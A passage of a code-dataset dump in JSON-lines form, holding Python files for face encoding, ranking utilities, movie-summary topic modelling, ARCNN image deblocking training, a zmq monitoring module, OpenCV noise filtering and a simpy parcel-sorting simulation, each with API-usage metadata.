"call"}, {"api_name": "numpy.genfromtxt", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "72943455", "text": "import logging\n\nfrom .encoder import get_encoder, extract_zip\nfrom os.path import join\n\nENCODER_PATH = \"facedecoder/temp/encoders\"\nIMAGE_PATH = \"facedecoder/temp/image\"\nZIP_PATH = \"facedecoder/temp/zip\"\nSLEEP_TIME = 2\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\nlog.setLevel(logging.DEBUG)\n\n\n# ловим сообщение что нужно обновлять из очередени что нужно обновлять\n\n# в очереди по ключу будет сообщение насчет обновления данных(в значение будет идентификатор названия папки где лежит\n# zip архив)\n\ndef run_model_updater(tech_info_about_model: tuple):\n\n token, model_uid = tech_info_about_model\n log.debug(\"Start create model - %r\", model_uid)\n log.debug(\"Extract zip - %r\", model_uid)\n\n # извлекаем содержимое архива в папку\n status: bool = extract_zip(join(ZIP_PATH, model_uid), IMAGE_PATH)\n if status:\n log.debug(\"Done extract zip - %r\", model_uid)\n log.debug(\"create encoders - %r\", model_uid)\n\n result: dict = get_encoder(join(IMAGE_PATH, model_uid), join(ENCODER_PATH, model_uid))\n\n log.debug(\"done encoders - %r\", model_uid)\n return result\n else:\n return {\"faces_encoders\": [], \"faces_mapping\": [], \"status\": status}\n", "sub_path": "facedecoder/manager.py", "file_name": "manager.py", "file_ext": "py", "file_size_in_byte": 1410, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 13, "usage_type": "attribute"}, {"api_name": "encoder.extract_zip", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "encoder.get_encoder", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "152688323", "text": "'''\nCreated on Mar 29, 2017\n\nprovides basic utilities for candidate rankings\n\n@author: meike.zehlike\n'''\n\nimport resource\n\ndef countProtected(ranking):\n result = 0\n for candidate in ranking:\n if candidate.isProtected:\n result += 1\n return result\n\n\ndef normalizeQualifications(ranking):\n \"\"\"normalizes candidate qualifications to be within [0, 1]\"\"\"\n # find highest qualification of candidate\n qualifications = [ranking[i].qualification for i in range(len(ranking))]\n highest = max(qualifications)\n for candidate in ranking:\n candidate.originalQualification = candidate.originalQualification / highest\n candidate.qualification = candidate.qualification / highest\n\n\ndef setMemoryLimit(maxMem):\n if maxMem is None:\n maxMem = -1\n try:\n resource.setrlimit(resource.RLIMIT_MEMLOCK, (1, maxMem))\n return True\n except ValueError:\n return False\n\n\nclass Switch(object):\n def __init__(self, value):\n self.value = value\n self.fall = False\n\n def __iter__(self):\n \"\"\"Return the match method once, then stop\"\"\"\n yield self.match\n raise StopIteration\n\n def match(self, *args):\n 
\"\"\"Indicate whether or not to enter a case suite\"\"\"\n if self.fall or not args:\n return True\n elif self.value in args: # changed for v1.5, see below\n self.fall = True\n return True\n else:\n return False\n", "sub_path": "src/utilsAndConstants/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1472, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "resource.setrlimit", "line_number": 33, "usage_type": "call"}, {"api_name": "resource.RLIMIT_MEMLOCK", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "239207390", "text": "import pandas as pd\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk import word_tokenize \r\nfrom nltk.stem import WordNetLemmatizer\r\nlemmatizer = WordNetLemmatizer()\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.decomposition import NMF\r\nfrom sklearn.preprocessing import Normalizer\r\nfrom sklearn.pipeline import make_pipeline\r\n\r\n\r\nnltk.download(\"stopwords\")\r\nnltk.download(\"punkt\")\r\nnltk.download(\"wordnet\")\r\nstop_words = set(stopwords.words('english'))\r\n\r\n\r\n\r\n\r\n\r\ndef clean_text(text):\r\n tokens = word_tokenize(text)\r\n tokens_transformed = [lemmatizer.lemmatize(t.lower()) for t in tokens if t not in stop_words]\r\n s = \"\"\r\n for t in tokens_transformed:\r\n s = s + t + \" \"\r\n return s\r\n\r\n\r\ndef make_df():\r\n df_original = pd.read_excel(\"imdb_movie_summary.xlsx\")\r\n df = df_original.copy()\r\n df[\"transformed_summary\"] = df[\"summary\"].apply(clean_text) \r\n \r\n tfidf = TfidfVectorizer() \r\n \r\n \r\n model = NMF(n_components = 100)\r\n \r\n \r\n scaler = Normalizer()\r\n \r\n \r\n pipeline = make_pipeline(tfidf, model)\r\n \r\n df_transformed = pd.DataFrame(pipeline.fit_transform(df.transformed_summary), index = df.titles)\r\n \r\n genre_master = [\"drama\", \"comedy\", \"romance\", \"horror\", \"action\", \"sci-fi\", \"sport\", \"fantasy\", \"crime\", \"music\", \"war\", \"biography\", \"thriller\", \"mystery\", \"family\", \"animation\", \"adventure\", \"musical\", \"history\", \"western\", \"film-noir\" ]\r\n genre_dict = {\"drama\": 1, \"comedy\": 2, \"romance\": 3, \"horror\": 4, \"action\": 5, \"sci-fi\": 6, \"sport\":7, \"fantasy\": 8, \"crime\": 9, \"music\": 10, \"war\": 11, \"biography\": 12, \"thriller\": 13, \"mystery\": 14, \"family\": 15, \"animation\": 16, \"adventure\": 17, \"musical\": 18, \"history\": 19, \"western\": 20, \"film-noir\": 21}\r\n full = []\r\n for g in df.genre:\r\n g = g.lower()\r\n ind = [genre_dict.get(x) for x in g.split(\", \")]\r\n temp = []\r\n for i in range(1, len(genre_master) + 1):\r\n if i in ind:\r\n temp.append(1)\r\n else:\r\n temp.append(0)\r\n full.append(temp)\r\n \r\n df_genre = pd.DataFrame(full, columns = genre_master, index = df.titles)\r\n df_combined = pd.DataFrame(scaler.fit_transform(pd.concat([df_transformed, df_genre], axis = 1)), index = df.titles)\r\n \r\n \r\n return df_combined\r\ndf = make_df()\r\ndf.to_excel(\"df_transformed.xlsx\")\r\n", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 2364, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 6, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 13, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 14, "usage_type": "call"}, {"api_name": 
"nltk.download", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 16, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 16, "usage_type": "name"}, {"api_name": "nltk.word_tokenize", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.decomposition.NMF", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Normalizer", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "27380265", "text": "from __future__ import print_function\n\nfrom math import log10\n\nimport numpy\nimport h5py\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom model import NetARCNN\n\nimport argparse\n\nfrom datetime import datetime\n\nlogfile = \"log/log_ARCNN_\" + str(datetime.now()) + \".txt\"\ntrain_data_path = \"dataset/train_data.h5\"\ntest_data_path = \"dataset/test_data.h5\"\ncheckpoint_path = \"checkpoint_ARCNN/\"\n\n\nparser = argparse.ArgumentParser(description=\"Pytorch Deblocking Example\")\nparser.add_argument(\"--batchSize\", type=int, default=100, help=\"training batch size\")\nparser.add_argument(\"--testBatchSize\", type=int, default=30, help=\"testing batch size\")\nparser.add_argument(\"--nEpochs\", type=int, default=30, help=\"number of epochs to train for\")\nparser.add_argument(\"--lr\", type=float, default=0.0001, help=\"Learning Rate\")\n# Notice: it is \"action\" for cuda options, not type\nparser.add_argument(\"--cuda\", action=\"store_true\", help=\"use cuda?\") # what is \"store true\"?\n# parser.add_argument(\"--threads\", type=int, default=4, help=\"number of threads for data loader to use\")\nparser.add_argument(\"--seed\",type=int, default=123, help=\"random seed to use. Default = 123\")\n# parser.add_argument(\"--logfile\",type=str, default=logfile, help=\"name of log file for training\")\nopt = parser.parse_args()\nprint(opt)\n\n\n\nprint(\"===> Building logfile\")\noutput = open(logfile,'a+')\n# output = open(\"log_\"+str(datetime.now())+\".txt\")\n# output = open(\"train_result.txt\")\noutput.write(\"Model: ARCNN\\nbatchSize: {}\\ntestBatchSize: {}\\nnEpochs: {}\\nlearningRate: {}\\n\\nEpoch |PSNR before |PSNR after\".format(opt.batchSize, opt.testBatchSize, opt.nEpochs, opt.lr))\noutput.close()\n\ncuda = opt.cuda\nif cuda and not torch.cuda.is_available():\n raise Exception(\"No GPU found, please run without --cuda\") \n\ntorch.manual_seed(opt.seed)\nif cuda:\n torch.cuda.manual_seed(opt.seed)\n\n# print(\"===> Loading datasets\")\n\nprint(\"===> Building model\")\nmodel = NetARCNN()\n# model.load_state_dict(torch.load(checkpoint_path+\".pkl\"))\n\ncriterion = nn.MSELoss()\n\nif cuda:\n model = model.cuda()\n criterion = criterion.cuda()\n\noptimizer = optim.Adam(model.parameters(), lr=opt.lr)\n\ndef train(epoch, train_data, batch_size):\n\n epoch_loss = 0\n iter_num = 10\n for i in range(iter_num):\n\n # !! 
iter_num is only for testing and needs to be updated later\n\n        ran = numpy.sort(numpy.random.choice(train_data['data'].shape[0], batch_size, replace=False))\n        batch_data = Variable(torch.from_numpy(train_data['data'][ran,:,:,:].astype(numpy.float32)/255.0))\n        batch_label = Variable(torch.from_numpy(train_data['label'][ran,:,:,:].astype(numpy.float32)/255.0))\n        if cuda:\n            batch_data = batch_data.cuda()\n            batch_label = batch_label.cuda()\n\n        optimizer.zero_grad()\n        # Error: argument 0 is not a Variable ?\n        # Maybe it is because the order of the batch_data? currently [4*32*32*1]\n        # the correct order is [4*1*32*32] and I have already fixed it,\n        # but the bug still exists\n        # print(batch_data)\n        loss = criterion(model(batch_data), batch_label)\n        epoch_loss += loss.data[0]\n        loss.backward()\n        optimizer.step()\n\n        print(\"===> Epoch[{}]({}/{}): Loss: {:.6f}\".format(epoch, i, iter_num, loss.data[0]))\n    \n    print(\"===> Epoch {} Complete: Avg. Loss: {:.6f}\".format(epoch, epoch_loss / iter_num))\n    \n\n\ndef test(epoch, test_data, test_batch_size):\n    avg_psnr1 = 0\n    avg_psnr2 = 0\n    iter_num = 5\n    for i in range(iter_num):\n\n        # !! iter_num is only for testing and needs to be updated later\n\n        ran2 = numpy.sort(numpy.random.choice(test_data['data'].shape[0],test_batch_size, replace=False))\n        batch_data = Variable(torch.from_numpy(test_data['data'][ran2,:,:,:].astype(numpy.float32)/255.0))\n        batch_label = Variable(torch.from_numpy(test_data['label'][ran2,:,:,:].astype(numpy.float32)/255.0))\n        if cuda:\n            batch_data = batch_data.cuda()\n            batch_label = batch_label.cuda()\n\n        prediction = model(batch_data)\n        \n        mse1 = criterion(batch_data, batch_label)\n        mse2 = criterion(prediction, batch_label)\n        psnr1 = 10 * log10(1 / mse1.data[0])\n        psnr2 = 10 * log10(1 / mse2.data[0])\n\n        avg_psnr1 += psnr1\n        avg_psnr2 += psnr2\n    print(\"===> Before: Avg. PSNR: {:.5f} dB; after: Avg. PSNR: {: .5f} dB\".format((avg_psnr1 / iter_num), (avg_psnr2 / iter_num)))\n    # print the result to a file so as to track the tendency\n    # output = open('train_result.txt','a+')\n    output = open(logfile, 'a+')\n    output.write(\"{} {: .5f} {: .5f}\\n\".format(epoch, (avg_psnr1/iter_num), (avg_psnr2/iter_num)))\n    output.close()\n\ndef checkpoint(epoch):\n    # model_out_path = \"model_epoch_{}.pth\".format(epoch) # is that all right? \n    # torch.save(model, checkpoint_path+model_out_path)\n    torch.save(model.state_dict(), checkpoint_path+(\"checkpoint_ARCNN_epoch_{}.pkl\".format(epoch))) # use this line to save parameters only \n    print(\"Checkpoint saved to {}\".format(checkpoint_path))\n\n# can I open 2 files at one time? 
\n# A: Sure\n\ntrain_data = h5py.File(train_data_path, \"r\")\ntest_data = h5py.File(test_data_path, \"r\")\n\n\nfor epoch in range(1, opt.nEpochs + 1):\n train(epoch, train_data, opt.batchSize)\n test(epoch, test_data, opt.testBatchSize)\n checkpoint(epoch)\n\n", "sub_path": "train_batch.py", "file_name": "train_batch.py", "file_ext": "py", "file_size_in_byte": 5436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 53, "usage_type": "attribute"}, {"api_name": "model.NetARCNN", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "model.cuda", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 67, "usage_type": "name"}, {"api_name": "model.parameters", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.sort", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 110, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 111, "usage_type": "attribute"}, {"api_name": "math.log10", "line_number": 120, "usage_type": "call"}, {"api_name": "math.log10", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 135, "usage_type": "call"}, {"api_name": "model.state_dict", "line_number": 135, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 141, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "453583940", "text": "#!/usr/bin/env python\n\nimport copy\nimport logging\n\nfrom hc.monitor import 
Monitor\n\nlogger = logging.getLogger(\"Monitor.{}\".format(__name__))\n\n\nclass zmq_send(Monitor):\n\n def __init__(self, config, **args):\n Monitor.__init__(self, config, **args)\n\n self.metrics = self.getconfig(\"metrics\", default=[])\n self.savevar = self.getconfig(\"save\", default=False)\n self.timeout = self.getconfig(\"timeout\", default=2)\n self.ignore_missing = self.getconfig(\"ignore_missing\", default=True)\n\n def search(self, items):\n\n if isinstance(items, dict):\n\n if 'query' in items:\n status, results = self.getvars(self.build_query(items), first=False)\n if not status:\n raise Exception('Missing value')\n\n if len(results) == 1:\n return results[0]['values']\n else:\n data = {}\n for res in results:\n # FIXME: it takes only the last path part into account\n data[res['path'][-1]] = res['values']\n return data\n elif 'value' in items:\n return items['value']\n else:\n for key, value in items.items():\n items[key] = self.search(value)\n elif isinstance(items, list):\n for idx, item in enumerate(items):\n items[idx] = self.search(item)\n else:\n return self.getconfig(items, search_cfg=False)\n\n return items\n\n def build_query(self, keys, res=False, op_type='append'):\n\n if isinstance(keys, list):\n query = {'query': keys}\n else:\n query = keys\n\n if 'servers' in query:\n if isinstance(query['servers'], dict):\n ressrv, query['servers'] = self.getvars(query['servers'], default=[])\n\n try:\n if query['ns'] == 'localhost':\n query['ns'] = self.namespace\n except KeyError:\n pass\n\n if not res:\n return query\n\n if 'query' in query:\n try:\n query['query'][1][1] = res\n except(IndexError):\n logger.debug('Operation: {}'.format(op_type))\n if op_type == 'extend':\n query['query'][1].extend(res)\n else:\n query['query'][1].append(res)\n\n return query\n\n def get_from(self, keys):\n logger.debug('Getting data from: {}'.format(keys))\n if type(keys['from']) not in [list, dict]:\n return keys['from']\n\n return self.search(keys['from'])\n\n def send_to(self, name, keys, results, op_type='append'):\n\n logger.debug('Data to: {}'.format(keys['to']))\n\n data = {'failed': set(), 'ok': set()}\n\n try:\n onchange = keys['to']['onchange']\n except KeyError:\n onchange = False\n\n if onchange:\n resstatus, old_res = self.getvars(['DR', [[self.modulename, name, 'from']]])\n if not resstatus:\n logger.debug('No old data available.')\n old_res = None\n elif old_res == results:\n logger.debug('Results are the same.')\n return None\n\n query = self.build_query(keys['to'], res=results, op_type=op_type)\n resstatus, back_res = self.getvars(query, raw=True)\n\n for srv, res in back_res:\n if not res:\n data['failed'].add(srv)\n elif res['status']:\n data['ok'].add(srv)\n\n return data\n\n def resolve_when(self, keys):\n\n try:\n conditions = keys['when']\n except KeyError:\n return False\n\n for cond in conditions:\n logger.debug(\"When condition: {}\".format(cond))\n rsstat, results = self.getvars(cond)\n logger.debug(\"When Status: {} Result: {}\".format(rsstat, results))\n\n if not rsstat:\n logger.debug(\"Condition not found: not executing: {}\".format(cond))\n return True\n\n if not results['resolved'][0]:\n logger.debug(\"Condition not met: not executing: {}\".format(cond))\n return True\n\n return\n\n def runit(self):\n\n status = 0\n errs = ''\n\n data = {}\n for metric in self.metrics:\n name = list(metric.keys())[0]\n keys = copy.deepcopy(metric[name])\n\n if self.resolve_when(keys):\n continue\n\n try:\n results = self.get_from(keys)\n # FIXME: create a special type of 
exception\n            except Exception as err:\n                logger.debug(err)\n                if self.ignore_missing:\n                    continue\n                raise(err)\n\n            data[name] = {'from': {}, 'to': {}}\n            if self.savevar:\n                data[name]['from'] = results\n\n            op_type = keys.get('op_type', 'append')\n            data[name]['to'] = self.send_to(name, keys, results, op_type=op_type)\n\n        return status, data, {}, errs\n", "sub_path": "hc/modules/zmq_send.py", "file_name": "zmq_send.py", "file_ext": "py", "file_size_in_byte": 5145, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "hc.monitor.Monitor", "line_number": 11, "usage_type": "name"}, {"api_name": "hc.monitor.Monitor.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "hc.monitor.Monitor", "line_number": 14, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 151, "usage_type": "call"}]}
+{"seq_id": "261531065", "text": "import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef salt(img, n):\n    for k in range(n):\n        i = int(np.random.random() * img.shape[1]);\n        j = int(np.random.random() * img.shape[0]);\n        if img.ndim == 2:\n            img[j,i] = 255\n        elif img.ndim == 3:\n            img[j,i,0]= 255\n            img[j,i,1]= 255\n            img[j,i,2]= 255\n    return img\n\n\n\n\nimg = cv2.imread(r\"D:\\Python_all\\pythonholder\\practice_project\\character_recognition\\test_image\\test\\test03\\mid_grabcut_result.jpg\",0)\n# img = cv2.resize(img,(384,216))\n# Gaussian blur\nlbimg=cv2.GaussianBlur(img,(3,3),1.8)\n# median blur\nimg = salt(img, 500)\nmiddle = cv2.medianBlur(img, 5)\n# cv2.imwrite(r\"D:\\Python_all\\pythonholder\\practice_project\\character_recognition\\test_image\\test\\test03\\ middle.jpg\", middle, params=None)\nimg = cv2.resize(img,(680,480))\nlbimg = cv2.resize(lbimg,(680,480))\n\n\nmiddle = cv2.resize(middle,(680,480))\ncv2.imshow('src',img)\ncv2.imshow('dst',middle)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n", "sub_path": "filter/filter_recognizition.py", "file_name": "filter_recognizition.py", "file_ext": "py", "file_size_in_byte": 1020, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.random", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "634933196", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor: Ted\nDate: 2017-07-13\nNotes:\n\nPackage class\nCargo class\nUld class\n\n\"\"\"\nimport simpy\nimport pandas as pd\n\nfrom collections import namedtuple, defaultdict\nfrom src.utils import PackageRecord, PipelineRecord, TruckRecord\nfrom 
src.controllers import PathGenerator\nimport logging\n\n__all__ = [\"Package\", \"Truck\", \"Uld\", \"SmallBag\", \"SmallPackage\", \"Pipeline\", \"PipelineRes\", \"BasePipeline\"]\n\n# init path generator\npath_generator = PathGenerator()\n\n\nclass Package:\n    \"\"\"Package\"\"\"\n    def __init__(self,\n                 env: simpy.Environment,\n                 attr: pd.Series,):\n\n        # all package info is kept in attr\n        self.attr = attr\n        # id\n        self.item_id = self.attr[\"parcel_id\"]\n        # env\n        self.env = env\n        # data store\n        self.machine_data = []\n        self.pipeline_data = []\n        # path_generator\n        self.path_generator = path_generator.path_generator\n        # paths\n        self.planned_path = None\n        self.path = None\n        # next pipeline_id\n        self.next_pipeline = None\n\n    # use in unload machine\n    def set_path(self, package_start):\n\n        dest_code = self.attr[\"dest_zone_code\"]\n        dest_type = self.attr[\"dest_type\"]\n        parcel_type = self.attr[\"parcel_type\"]\n        sorter_type = \"reload\" if parcel_type == \"parcel\" else \"small_sort\"\n\n        path = path_generator.path_generator(package_start, dest_code, sorter_type, dest_type)\n\n        self.planned_path = tuple(path)\n        self.path = list(self.planned_path)\n        self.next_pipeline = self.planned_path[:2]\n\n    def insert_data(self, record: namedtuple):\n        # print out data\n        if isinstance(record, PackageRecord):\n            self.machine_data.append(record)\n\n            logging.debug(msg=f\"Package: {record.package_id} , action: {record.action}\"\n                              f\", equipment: {record.equipment_id}, timestamp: {record.time_stamp}\")\n\n        elif isinstance(record, PipelineRecord):\n            self.pipeline_data.append(record)\n\n            logging.debug(msg=f\"Package: {record.package_id} , action: {record.action}\"\n                              f\", pipeline: {record.pipeline_id}, timestamp: {record.time_stamp}\")\n\n        else:\n            raise ValueError(\"Wrong type of record\")\n\n    def pop_mark(self):\n        \"\"\"Drop the first node and set the next pipeline id: (now_loc, next_loc)\"\"\"\n        self.path.pop(0)\n        if len(self.path) >= 2:\n            self.next_pipeline = tuple(self.path[0: 2])\n        # when the package reaches reload (final sort), the final-sort queue id is a single value\n        elif len(self.path) == 1:\n            self.next_pipeline = self.path[-1]\n        else:\n            raise ValueError('The path is already empty!')\n        # remove the now_loc\n        # update the next pipeline id\n\n    def __str__(self):\n        display_dct = dict(self.attr)\n        return f\"<Package {display_dct}>\"\n\n\nclass SmallPackage(Package):\n    \"\"\"Small package\"\"\"\n    def __str__(self):\n        display_dct = dict(self.attr)\n        return f\"<SmallPackage {display_dct}>\"\n\n\nclass SmallBag(Package):\n    \"\"\"Bag of small packages\"\"\"\n    def __init__(self, env: simpy.Environment,\n                 attr: pd.Series,\n                 small_packages: list):\n\n        super(SmallBag, self).__init__(env, attr,)\n\n        # store the small packages\n        self.store = small_packages\n        assert self._all_are_small_packages(), \"SmallBag stores SmallPackage only !!\"\n        self.store_size = len(self.store)\n\n    def _all_are_small_packages(self):\n        packages_bool = [isinstance(small_package, SmallPackage) for small_package in self.store]\n        return all(packages_bool)\n\n    def __str__(self):\n        display_dct = dict(self.attr)\n        return f\"<SmallBag {display_dct}>\"\n\n\nclass Truck:\n    \"\"\"Truck\"\"\"\n    def __init__(self, env: simpy.Environment, item_id: str, come_time: int, truck_type: str, packages: list):\n        \"\"\"\n        :param truck_id: self-explanatory\n        :param come_time: self-explanatory\n        :param packages: a data frame containing all packages\n        \"\"\"\n        self.item_id = item_id\n        self.come_time = come_time\n        self.store = packages\n        assert self._all_are_packages(), \"Truck stores Package only !!\"\n        self.store_size = len(self.store)\n        self.truck_type = truck_type\n        self.env = env\n        self.truck_data = []\n\n    def _all_are_packages(self):\n        packages_bool = [isinstance(package, Package) for package in 
self.store]\n        return all(packages_bool)\n\n    def insert_data(self, record: namedtuple):\n\n        if isinstance(record, TruckRecord):\n            self.truck_data.append(record)\n        else:\n            raise ValueError(\"Wrong type of record\")\n\n    def __str__(self):\n        return f\"\"\n\n\nclass Uld(Truck):\n    \"\"\"Air cargo container (ULD)\"\"\"\n    pass\n\n\nclass BasePipeline:\n\n    def __init__(self, env: simpy.Environment, pipeline_id: str, equipment_id: str, machine_type: str, ):\n\n        self.env = env\n        self.pipeline_id = pipeline_id\n        self.equipment_id = equipment_id\n        self.queue_id = pipeline_id\n        self.machine_type = machine_type\n        self.queue = simpy.Store(env)\n\n    def get(self):\n        return self.queue.get()\n\n    def put(self, item):\n\n        item.insert_data(\n            PipelineRecord(\n                pipeline_id=':'.join(self.pipeline_id),\n                queue_id=self.queue_id,\n                package_id=item.item_id,\n                time_stamp=self.env.now,\n                action=\"start\", ))\n\n        self.queue.put(item)\n\n\nclass Pipeline:\n\n    \"\"\"Conveyor belt\"\"\"\n\n    def __init__(self,\n                 env: simpy.Environment,\n                 delay_time: float,\n                 pipeline_id: tuple,\n                 queue_id: str,\n                 machine_type: str,\n                 ):\n\n        self.env = env\n        self.delay = delay_time\n        self.queue = simpy.Store(env)\n        self.pipeline_id = pipeline_id\n        self.queue_id = queue_id\n        self.machine_type = machine_type\n        self.equipment_id = self.pipeline_id[1]  # in Pipeline the equipment_id is equipment after this pipeline\n\n    def latency(self, item: Package):\n        \"\"\"Simulate the conveying time\"\"\"\n\n        # pipeline start server\n        item.insert_data(\n            PipelineRecord(\n                pipeline_id=':'.join(self.pipeline_id),\n                queue_id=self.queue_id,\n                package_id=item.item_id,\n                time_stamp=self.env.now,\n                action=\"start\", ))\n\n        yield self.env.timeout(self.delay)\n        # cutting path\n        item.pop_mark()\n\n        # package wait for next process\n        item.insert_data(\n            PackageRecord(\n                equipment_id=self.equipment_id,\n                package_id=item.item_id,\n                time_stamp=self.env.now,\n                action=\"wait\", ))\n\n        # pipeline end server\n        item.insert_data(\n            PipelineRecord(\n                pipeline_id=':'.join(self.pipeline_id),\n                queue_id=self.queue_id,\n                package_id=item.item_id,\n                time_stamp=self.env.now,\n                action=\"end\", ))\n\n        self.queue.put(item)\n\n    def put(self, item: Package):\n        self.env.process(self.latency(item))\n\n    def get(self):\n        return self.queue.get()\n\n    def __str__(self):\n        return f\"\"\n\n\nclass PipelineRes(Pipeline):\n\n    def __init__(self,\n                 env: simpy.Environment,\n                 resource_dict: defaultdict,\n                 equipment_resource_dict: dict,\n                 delay_time: float,\n                 pipeline_id: tuple,\n                 queue_id: str,\n                 machine_type: str,\n                 ):\n\n        super(PipelineRes, self).__init__(env,\n                                          delay_time,\n                                          pipeline_id,\n                                          queue_id,\n                                          machine_type,)\n\n        self.equipment_last = self.pipeline_id[0]  # in PipelineRes equipment_last is the equipment before this pipeline\n        self.equipment_next = self.pipeline_id[1]  # in PipelineRes equipment_next is the equipment after this pipeline\n        self.resource_id = equipment_resource_dict[self.equipment_last]\n        self.resource = resource_dict[self.resource_id][\"resource\"]\n\n    def latency(self, item: Package):\n\n        with self.resource.request() as req:\n            \"\"\"Simulate the conveying time\"\"\"\n\n            yield req\n\n            # pipeline 